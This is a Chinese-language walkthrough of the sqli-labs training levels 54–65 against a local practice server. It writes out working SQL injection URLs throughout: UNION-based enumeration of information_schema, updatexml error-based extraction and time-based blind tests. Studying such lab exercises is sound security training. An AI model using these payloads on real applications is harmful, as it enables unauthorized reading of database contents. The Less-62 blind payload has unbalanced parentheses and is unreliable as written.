Less54
从第54关开始,就比较偏向实际挑战方向,这一关对输入次数进行了限制,要求在十次之内,否则刷新数据库随机更新表名列名等信息
首先判断包裹形式,这一关为单引号包裹
http://127.0.0.1/sqli-labs-master/Less-54/?id=1‘--+
判断列数http://127.0.0.1/sqli-labs-master/Less-54/?id=1‘ order by 3--+
查看当前数据库 http://127.0.0.1/sqli-labs-master/Less-54/?id=-1‘ union select 1,2,database() --+ 当前数据库为challenges
查表 http://127.0.0.1/sqli-labs-master/Less-54/?id=-1‘ union select 1,2,group_concat(table_name)from information_schema.tables where table_schema=‘challenges‘--+
表名为f7fs4xzk70
查字段 http://127.0.0.1/sqli-labs-master/Less-54/?id=-1‘ union select 1,2,group_concat(column_name)from information_schema.columns where table_name=‘f7fs4xzk70‘--+
查信息 http://127.0.0.1/sqli-labs-master/Less-54/?id=-1‘ union select 1,2,group_concat(concat_ws(0x7e,secret_DPET))from challenges.f7fs4xzk70 --+
取出信息放入下面
我们成功过关
Less-55
这一关有14次机会,包裹形式为?id=1) 其他步骤均与Less54相同
Less-56
这一关包裹形式为?id=1‘) 其他步骤均与Less54相同
Less-57
这一关有14次机会,包裹形式为?id=1" 其他步骤均与Less54相同
Less-58
这一关只有五次机会,显然不能使用联合查询,这一关我们使用报错注入
有题目(刚打开的页面显示)可知,我们当前数据库为challenges
查表 http://127.0.0.1/sqli-labs-master/Less-58/?id=1‘ and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=‘challenges‘)),1)--+ 表名为v000pri418
查字段 http://127.0.0.1/sqli-labs-master/Less-58/?id=1‘ and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name=‘v000pri418‘)),1)--+
查信息 http://127.0.0.1/sqli-labs-master/Less-58/?id=1‘ and updatexml(1,concat(0x7e,(select group_concat(0x7e,secret_T5XO)from challenges.v000pri418)),1)--+
通关成功
Less-59
这一关没有包裹,其他均与第58关相同
Less-60
这一关的包裹形式为?id=1") 其他均与第58关相同,包裹形式不好测出,多试几次即可
Less-61
这一关的包裹形式为?id=1‘) 其他均与第58关相同,包裹形式不好测出,多试几次即可
Less-62
这一关给了130次机会,由此判断这一关主要使用盲注
判断包裹形式 http://127.0.0.1/sqli-labs-master/Less-62/?id=1‘) --+ 此次为单引号加括号
由题目可知数据库名字为challenges
测试数据库的长度
http://127.0.0.1/sqli-labs-master/Less-62/?id=1‘) if((length(database())=1),1,sleep(5)--+ 立刻回显
剩下的可以查看第8-10关的内容,我们也可以使用burpsuit,参考前面的第5关。
Less-63
包裹形式为?id=1‘ 在要求与方法上,本关与Less-62相同。
Less-64
包裹形式为?id=1)) 在要求与方法上,本关与Less-62相同。
Less-65
包裹形式为?id=1")在要求与方法上,本关与Less-62相同。